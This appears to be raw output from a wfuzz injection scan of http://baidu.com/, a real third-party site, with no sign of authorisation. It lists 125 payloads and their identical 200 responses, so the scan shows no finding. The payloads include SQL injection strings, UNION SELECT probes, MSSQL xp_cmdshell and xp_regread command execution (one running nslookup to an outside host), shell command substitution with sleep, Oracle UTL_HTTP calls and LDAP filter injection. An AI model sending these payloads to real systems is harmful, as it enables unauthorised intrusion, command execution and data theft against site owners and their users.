Target: http://baidu.com/
Total requests: 125
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00001:  C=200      3 L         5 W           81 Ch        "'"
00003:  C=200      3 L         5 W           81 Ch        "#"
00007:  C=200      3 L         5 W           81 Ch        "--';"
00031:  C=200      3 L         5 W           81 Ch        "or 0=0 #"
00015:  C=200      3 L         5 W           81 Ch        "\x3D%20\x27"
00034:  C=200      3 L         5 W           81 Ch        "' or '1'='1'--"
00035:  C=200      3 L         5 W           81 Ch        ""' or 1 --'""
00036:  C=200      3 L         5 W           81 Ch        "or 1=1--"
00038:  C=200      3 L         5 W           81 Ch        "or%201=1 --"
00037:  C=200      3 L         5 W           81 Ch        "or%201=1"
00033:  C=200      3 L         5 W           81 Ch        "" or 1=1--"
00030:  C=200      3 L         5 W           81 Ch        "" or 0=0 #"
00032:  C=200      3 L         5 W           81 Ch        "' or 1=1--"
00029:  C=200      3 L         5 W           81 Ch        "' or 0=0 #"
00028:  C=200      3 L         5 W           81 Ch        "or 0=0 --"
00039:  C=200      3 L         5 W           81 Ch        "' or 1=1 or ''='"
00027:  C=200      3 L         5 W           81 Ch        "" or 0=0 --"
00026:  C=200      3 L         5 W           81 Ch        "' or 0=0 --"
00025:  C=200      3 L         5 W           81 Ch        "0 or 1=1"
00024:  C=200      3 L         5 W           81 Ch        "')%20or%20('x'='x"
00023:  C=200      3 L         5 W           81 Ch        ""%20or%20"x"="x"
00022:  C=200      3 L         5 W           81 Ch        "'%20or%20'x'='x"
00021:  C=200      3 L         5 W           81 Ch        "'%20or%20''='"
00020:  C=200      3 L         5 W           81 Ch        "<>"'%;)(&+"
00019:  C=200      3 L         5 W           81 Ch        "admin'--"
00018:  C=200      3 L         5 W           81 Ch        "'or%20select *"
00017:  C=200      3 L         5 W           81 Ch        "\x27\x6F\x72 SELECT *"
00014:  C=200      3 L         5 W           81 Ch        "\x3D%20\x3B'"
00016:  C=200      3 L         5 W           81 Ch        "\x27\x4F\x52 SELECT *"
00013:  C=200      3 L         5 W           81 Ch        "\x27"
00012:  C=200      3 L         5 W           81 Ch        "\x23"
00010:  C=200      3 L         5 W           81 Ch        "=%20;"
00011:  C=200      3 L         5 W           81 Ch        "=%20--"
00009:  C=200      3 L         5 W           81 Ch        "=%20'"
00006:  C=200      3 L         5 W           81 Ch        "'%20--"
00008:  C=200      3 L         5 W           81 Ch        "'%20;"
00002:  C=200      3 L         5 W           81 Ch        """
00005:  C=200      3 L         5 W           81 Ch        "--"
00004:  C=200      3 L         5 W           81 Ch        "-"
00040:  C=200      3 L         5 W           81 Ch        "" or 1=1 or ""=""
00042:  C=200      3 L         5 W           81 Ch        "" or "a"="a"
00046:  C=200      3 L         5 W           81 Ch        "hi" or 1=1 --"
00054:  C=200      3 L         5 W           81 Ch        "PRINT"
00070:  C=200      3 L         5 W           81 Ch        "replace"
00089:  C=200      3 L         5 W           81 Ch        "' (select top 1"
00088:  C=200      3 L         5 W           81 Ch        "' or (EXISTS)"
00087:  C=200      3 L         5 W           81 Ch        "' UNION ALL SELECT"
00086:  C=200      3 L         5 W           81 Ch        "' UNION SELECT"
00085:  C=200      3 L         5 W           81 Ch        "\x27UNION SELECT"
00084:  C=200      3 L         5 W           81 Ch        "--sp_password"
00083:  C=200      3 L         5 W           81 Ch        "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00081:  C=200      3 L         5 W           81 Ch        "'; exec master..xp_cmdshell"
00082:  C=200      3 L         5 W           81 Ch        "'; exec xp_regread"
00080:  C=200      3 L         5 W           81 Ch        "exec sp"
00079:  C=200      3 L         5 W           81 Ch        "exec xp"
00078:  C=200      3 L         5 W           81 Ch        "' or user like '%"
00077:  C=200      3 L         5 W           81 Ch        "' or uid like '%"
00076:  C=200      3 L         5 W           81 Ch        "' or userid like '%"
00075:  C=200      3 L         5 W           81 Ch        "' or uname like '%"
00074:  C=200      3 L         5 W           81 Ch        "' or username like '%"
00073:  C=200      3 L         5 W           81 Ch        "bfilename"
00069:  C=200      3 L         5 W           81 Ch        "truncate"
00072:  C=200      3 L         5 W           81 Ch        "handler"
00071:  C=200      3 L         5 W           81 Ch        "like"
00068:  C=200      3 L         5 W           81 Ch        "having"
00067:  C=200      3 L         5 W           81 Ch        "distinct"
00066:  C=200      3 L         5 W           81 Ch        "update"
00065:  C=200      3 L         5 W           81 Ch        "delete"
00064:  C=200      3 L         5 W           81 Ch        "desc"
00063:  C=200      3 L         5 W           81 Ch        "asc"
00062:  C=200      3 L         5 W           81 Ch        "order by"
00061:  C=200      3 L         5 W           81 Ch        "limit"
00060:  C=200      3 L         5 W           81 Ch        "procedure"
00059:  C=200      3 L         5 W           81 Ch        "or"
00058:  C=200      3 L         5 W           81 Ch        "as"
00057:  C=200      3 L         5 W           81 Ch        "insert"
00056:  C=200      3 L         5 W           81 Ch        "select"
00053:  C=200      3 L         5 W           81 Ch        ",@variable"
00055:  C=200      3 L         5 W           81 Ch        "PRINT @@variable"
00052:  C=200      3 L         5 W           81 Ch        "@variable"
00051:  C=200      3 L         5 W           81 Ch        "'hi' or 'x'='x';"
00050:  C=200      3 L         5 W           81 Ch        "hi") or ("a"="a"
00049:  C=200      3 L         5 W           81 Ch        "hi') or ('a'='a"
00048:  C=200      3 L         5 W           81 Ch        "hi' or 'a'='a"
00045:  C=200      3 L         5 W           81 Ch        "hi" or "a"="a"
00047:  C=200      3 L         5 W           81 Ch        "hi' or 1=1 --"
00044:  C=200      3 L         5 W           81 Ch        "") or ("a"="a"
00041:  C=200      3 L         5 W           81 Ch        "' or a=a--"
00043:  C=200      3 L         5 W           81 Ch        "') or ('a'='a"
00090:  C=200      3 L         5 W           81 Ch        "'||UTL_HTTP.REQUEST"
00092:  C=200      3 L         5 W           81 Ch        "to_timestamp_tz"
00096:  C=200      3 L         5 W           81 Ch        "%27%20or%201=1"
00104:  C=200      3 L         5 W           81 Ch        "%7C"
00120:  C=200      3 L         5 W           81 Ch        "' or ''='"
00119:  C=200      3 L         5 W           81 Ch        "' or 1=1 or ''='"
00125:  C=200      3 L         5 W           81 Ch        "*/*"
00124:  C=200      3 L         5 W           81 Ch        "//*"
00123:  C=200      3 L         5 W           81 Ch        "//"
00122:  C=200      3 L         5 W           81 Ch        "/"
00121:  C=200      3 L         5 W           81 Ch        "x' or 1=1 or 'x'='y"
00103:  C=200      3 L         5 W           81 Ch        "|"
00117:  C=200      3 L         5 W           81 Ch        "!"
00118:  C=200      3 L         5 W           81 Ch        "%21"
00116:  C=200      3 L         5 W           81 Ch        "%26"
00115:  C=200      3 L         5 W           81 Ch        "&"
00114:  C=200      3 L         5 W           81 Ch        "%29"
00113:  C=200      3 L         5 W           81 Ch        ")"
00112:  C=200      3 L         5 W           81 Ch        "%28"
00111:  C=200      3 L         5 W           81 Ch        "("
00110:  C=200      3 L         5 W           81 Ch        "%2A%28%7C%28objectclass%3D%2A%29%29"
00109:  C=200      3 L         5 W           81 Ch        "*(|(objectclass=*))"
00108:  C=200      3 L         5 W           81 Ch        "%2A%28%7C%28mail%3D%2A%29%29"
00107:  C=200      3 L         5 W           81 Ch        "*(|(mail=*))"
00106:  C=200      3 L         5 W           81 Ch        "%2A%7C"
00105:  C=200      3 L         5 W           81 Ch        "*|"
00095:  C=200      3 L         5 W           81 Ch        "'%20or%201=1"
00101:  C=200      3 L         5 W           81 Ch        "'sqlattempt1"
00102:  C=200      3 L         5 W           81 Ch        "(sqlattempt2)"
00100:  C=200      3 L         5 W           81 Ch        "&apos;%20OR"
00099:  C=200      3 L         5 W           81 Ch        "char%4039%41%2b%40SELECT"
00098:  C=200      3 L         5 W           81 Ch        "%20'sleep%2050'"
00097:  C=200      3 L         5 W           81 Ch        "%20$(sleep%2050)"
00091:  C=200      3 L         5 W           81 Ch        "1;SELECT%20*"
00093:  C=200      3 L         5 W           81 Ch        "tz_offset"
00094:  C=200      3 L         5 W           81 Ch        "&lt;&gt;&quot;'%;)(&amp;+"

Total time: 0
Processed Requests: 125
Filtered Requests: 0
Requests/sec.: 0
